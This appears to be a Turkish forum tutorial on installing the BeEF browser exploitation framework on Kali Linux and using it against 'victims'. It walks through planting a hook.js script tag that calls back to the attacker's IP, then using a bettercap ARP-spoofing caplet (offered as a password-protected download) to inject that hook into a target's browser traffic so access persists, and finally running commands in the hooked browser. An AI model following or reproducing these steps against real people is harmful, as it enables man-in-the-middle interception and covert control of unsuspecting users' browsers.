BeEF Nedir ?
Merhaba arkadaşlar bu konuda Beef denilen bir aracı inceliyeceğiz bu araç browser exploitation framework diye geçiyor yani browserları sömürme aracı.
Hackerlar bu aracı hedef bilgisayarın tarayıcısında javascript kodu çalıştırmak için kullanıyor.
BeEF 3 katmandan oluşmaktadır.
1- Saldırgan veya Saldırganların kişisel bilgisayarları
2- BeEFin kurulu olduğu server
3- Hedefler
BeEF Kali Linux'e Nasıl Yüklenir ?
Terminali açıp bunu yazıyoruz.
Kod:
git clone [url]https://github.com/beefproject/beef[/url]
Yükleme bittikten sonra terminale ls yazıyoruz ve beef karşımıza çıktı.
cd beef yazıyoruz ve beef klasörünün içerisine giriyoruz.
Bir kereliğine mahsus ./install yazıyoruz ve çıkan sorulara "y" diyip enterlıyoruz.
Artık sistemi kapatım açtığımızda "cd beef" "./beef" dememiz yeterli.
Buradaki hata bizden beef in içerisindeki kullanıcı adı şifremizi değişmemizi istiyor.
Bunun için terminale nano config.yaml yazıyoruz.
user ve passwd değiştikten sonra "CTRL-O" "enter" "CTRL-X" yapıp basıp çıkış yapıyoruz.
Beef e giriş yapabilmek için ./beef yazdıktan sonra aşağıdaki adreslerden birine tıklayıp girebilirsiniz.
Arkadaşlar BeEF'i temel olarak anlayabilmeniz için ben apache server üzerinden göstereceğim.
İlk olarak Linux'un içeriside bulunan Apache adında servisi kullanarak web site oluşturacağım.
Bu sadece örnek amaçlıdır siz daha yaratıcı düşünerek kurbanları oltaya takabilirsiniz.
Bunun için konsola gelip service apache2 start yazıyorum.
Daha sonra sitemin indexini düzenliyorum bunun için /var/www/index.html dizinine gidiyorum.
İndex.html i leafpad yada başka bir uygulama yardımıyla açıp içerisine <script src="http://127.0.0.1:3000/hook.js"></script> kodu yapıştırıyoruz 127.0.0.1 yerine kendi İp adresinizi yazmanız gerekiyor.
Kendi ipimizi öğrenmek için terminale gelip ifconfig yazıyoruz benimki 10.0.2.10 bu yüzden koda böyle yazıyorum <script src="http://10.0.2.10:3000/hook.js"></script>
Evet artık hedefimiz oltaya geldi hedefimize uzun süre erişebilmek için kurbanın sitede durması gerekiyor. Peki biz bu durumu nasıl aşabiliriz adam sitemizden çıksa bile nasıl erişebiliriz şimdi buna gelelim.
Kurbanımızın tarayıcısına bir Javascript kodu enjekte edeceğiz bu sayede sitemizden çıksa bile erişim sağlayabileceğiz.
Bunun için Kali Linux da bulunan bettercap'i kullanacağız.
İlk önce konunun aşağısında size verdiğim beefcustom.zip adlı dosyayı indirmeniz gerekiyor.
İndirdiğimiz RAR dosyanın içerisindeki beefcustom adlı dosyayı usr/share/bettercap/caplets dizinine atıyoruz
Beefcustom dosyanın içindeki beefcustom.cap adlı dosyayı leafpad yada başka bir uygulama ile açın.
set arp.spoof.targets 10.0.2.4 yazan yerdeki ip yerine kurbanımızın ipsini yazıyoruz.
Sonra beefcustom.js adlı dosyayı aynı şekilde açıyoruz 10.0.2.8 yerine kendi ip adresimizi yazıyoruz kaydedip kapatıyoruz.
Bettercamp çalıştırmak için terminale bettercap -iface eth0 -caplet /usr/share/bettercap/caplets/beefcustom/beefcustom.cap yazıyoruz.
Ever artık kurban online şimdi kurbanımızın browserında komutlarımızı deneyelim bunun için alttaki fotoğrafta görülen Commands bölümüne tıklıyoruz.
Yeşil yananlar çalışır, Kırmızı olanlar düşük ihtimalle çalışır demek.
Ben Commands bölümündeki Browser bölümüne tıklıyorum, buradan Hooked Domain de Create Alert Dialog diye bir komut var bu kurbanımıza bir uyarı mesajı gönderecek deniyelim.
Evet uyarı mesajımız geldi.
BEEF CUSTOM İNDİRME LİNKİ : https://www.dosyaupload.com/cgZ8
RAR PASS : pytang
VIRUS TOTAL : https://www.virustotal.com/gui/file/aabda3a7204625e230723e544cef423f57240b2e6273c6b5ed04edb1168a8056/detection
Konum bu kadar arkadaşlar ilerleyen günlerde beef'in içerisindeki komutları anlatan bir konu açacağım o konuyu okuyarak da beef komutlarını öğrenebilirsiniz, okuduğunuz için teşekkürler.
Son düzenleme:
